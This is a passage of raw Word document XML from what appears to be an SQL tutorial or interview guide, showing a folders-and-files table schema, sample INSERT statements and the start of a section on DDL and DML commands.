          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    created_at </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="5C2699"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TIMESTAMP</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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DEFAUL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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FOREIG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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (folder_id) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> folders(folder_id)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7150FE6B"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le_id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Uniquely identifies each file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D51C5"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le_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores the name of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76D8FF"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older_id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Refers to the folder_id in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Folders</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> table, indicating which folder the file is stored in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F6DBB"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created_at</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores the timestamp when the file is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D1502A" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">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Example of Folder and File Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFD1BB2"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Folder Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C5D98" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="144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older A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (folder_id = 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253F7992" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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older B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (folder_id = 2, parent_id = 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27985B" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="288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older C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (folder_id = 3, parent_id = 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C8504" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360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le1.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (file_id = 1, folder_id = 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6457DFDD"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sert Data into the Tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4E7140" w14:textId="77777777" w:rsidR="000A0B7D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A0B7D" w:rsidP="000A0B7D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="007400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Insert folders</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSER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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> folders (folder_id, folder_name, parent_id)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VALUE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1C00CF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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C41A16"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'Folder A'</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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSER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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> folders (folder_id, folder_name, parent_id)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VALUE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1C00CF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</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C41A16"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'Folder B'</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1C00CF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSER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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> folders (folder_id, folder_name, parent_id)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VALUE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1C00CF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</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C41A16"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'Folder C'</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1C00CF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="007400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Insert file in the deepest folder (Folder C)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSER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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> files (file_id, file_name, folder_id)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VALUES</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1C00CF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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C41A16"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'File1.tx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1C00CF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A386F10" w14:textId="0AF39958" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="000A0B7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191A2AFE" w14:textId="4EF67D6C"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Number of Tables Required:</w:t>
      </w:r>
      <w:r w:rsidR="00604E82" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2 Tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF00634" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="144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olders Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for storing hierarchical folder information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622AA7A5" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>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Files Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for storing file details and associating them with folders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196E4BF8" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">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 xml:space="preserve">By using the parent_id column in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Folders Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nested folder structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Files Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> associates files with their respective folders, allowing you to store files within nested folders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032025FB" w14:textId="7B4FF747" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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CBAF4DA">
          <v:rect id="_x0000_i2965" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F40865A" w14:textId="0892FA18" w:rsidR="004A5A54" w:rsidRPr="00CE4B95" w:rsidRDefault="004A5A54">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="706" w:name="_Toc196308186"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are DDL and DML commands?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="706"/>
    </w:p>
    <w:p w14:paraId="622D585E" w14:textId="5010294B" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0" w:rsidP="00393B05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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DL (Data Definition Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
